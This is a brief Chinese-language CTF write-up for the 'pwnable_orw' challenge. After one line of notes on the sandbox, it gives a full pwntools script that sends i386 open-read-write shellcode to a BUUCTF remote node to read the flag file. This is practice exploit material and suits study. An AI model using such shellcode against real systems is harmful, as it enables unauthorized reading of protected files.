pwnable_orw
查看保护
加了沙盒。orw吧。去网上搜一下orw的汇编一大把。这里也可以用pwntools自带的。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25964)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
orw_open = '''
xor ecx,ecx;
xor edx,edx;
push ecx;
push 0x67616c66;
mov ebx,esp;
mov eax,0x5;
int 0x80;
'''
orw_read = '''
mov eax,0x3;
mov ecx,ebx;
mov ebx,0x3;
mov edx,0x100;
int 0x80;
'''
orw_write = '''
mov eax,0x4;
mov ebx,0x1;
int 0x80;
'''
shellcode = asm(orw_open + orw_read + orw_write)
r.sendline(shellcode)
r.interactive()